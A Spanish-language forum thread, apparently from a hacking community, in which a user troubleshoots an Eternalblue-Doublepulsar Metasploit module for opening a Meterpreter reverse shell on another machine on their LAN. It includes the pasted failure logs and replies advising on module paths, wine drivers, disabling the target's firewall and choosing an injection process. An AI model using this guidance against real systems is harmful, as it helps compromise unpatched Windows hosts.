Buenas tardes, quiero crear una sesion de meterpreter a mi otro equipo de mi misma red local , sin embargo por muchos intentos que he realizado , no he podido ya que me figura luego de realizar todo e intentar lanzar el exploit me indica esto, alguien le paso alguna vez???
- Started reverse TCP handler on 192.168.1.23:4444
- 192.168.1.17:445 - Generating Eternalblue XML data
cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.Skeleton.xml': No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Eternalblue-2.2.0.xml: No such file or directory
- 192.168.1.17:445 - Generating Doublepulsar XML data
cp: cannot stat '/root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.Skeleton.xml': No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
sed: can't read /root/Eternalblue-Doublepulsar-Metasploit/deps//Doublepulsar-1.3.1.xml: No such file or directory
- 192.168.1.17:445 - Generating payload DLL for Doublepulsar
- 192.168.1.17:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
- 192.168.1.17:445 - Launching Eternalblue...
sh: 1: cd: can't cd to /root/Eternalblue-Doublepulsar-Metasploit/deps/
0027:err:ntdll:RtlpWaitForCriticalSection section 0x7bd117e0 "loader.c: loader_section" wait timed out in thread 0027, blocked by 0026, retrying (60 sec)
001a:err:ntdll:RtlpWaitForCriticalSection section 0x7bd117e0 "loader.c: loader_section" wait timed out in thread 001a, blocked by 001b, retrying (60 sec)
0019:err:ntdll:RtlpWaitForCriticalSection section 0x7bd117e0 "loader.c: loader_section" wait timed out in thread 0019, blocked by 001b, retrying (60 sec)
000f:err:service:process_send_command receiving command result timed out
wine: cannot find L"C:\\windows\\system32\\Eternalblue-2.2.0.exe"
[-] 192.168.1.17:445 - Are you sure it's vulnerable?
- 192.168.1.17:445 - Launching Doublepulsar...
sh: 1: cd: can't cd to /root/Eternalblue-Doublepulsar-Metasploit/deps/
wine: cannot find L"C:\\windows\\system32\\Doublepulsar-1.3.1.exe"
[-] 192.168.1.17:445 - Oops, something was wrong!
- Exploit completed, but no session was created.
Usas el módulo de metasploit que personaliza eleven path?
Si es así sólo debes configurar la ruta de la carpeta que te indica en el repositorio donde descargaste el módulo y te explotara la vulnerabilidad.
Muchisimas gracias , pude dar con el error ahora cambie las IPs , el directorio como me dijiste hice otras maquinas nuevas y comence de 0 , todo fino ahora cuando intenta conectar aparece esto. Si me salvas de esta eres mi heroe , jaja
- Started reverse TCP handler on 192.168.0.28:4444
- 192.168.0.97:445 - Generating Eternalblue XML data
- 192.168.0.97:445 - Generating Doublepulsar XML data
- 192.168.0.97:445 - Generating payload DLL for Doublepulsar
- 192.168.0.97:445 - Writing DLL in /root/.wine/drive_c/eternal11.dll
- 192.168.0.97:445 - Launching Eternalblue...
000f:err:service:process_send_command receiving command result timed out
0015:err:service:process_send_command receiving command result timed out
002a:err:plugplay:handle_bus_relations Failed to load driver L"WineHID"
[-] Error getting output back from Core; aborting...
[-] 192.168.0.97:445 - Are you sure it's vulnerable?
- 192.168.0.97:445 - Launching Doublepulsar...
Hola @EXUMER (https://underc0de.org/foro/index.php?action=profile;u=85077), pueden ser los siguientes problemas:
* - Driver de wine (Intenta actualizarlo)
* - El objetivo el cual intentas atacar no es vulnerable o tiene el firewall habilitado (Si tienes acceso físico a la computadora víctima, deshabilita el firewall y haz de nuevo el ataque)
* - Configura bien el proceso a inyectar (Esta es menos probable, pero trata de escojer un proceso el cual no se cuelgue o relentize el PC)
Espero haberte ayudado.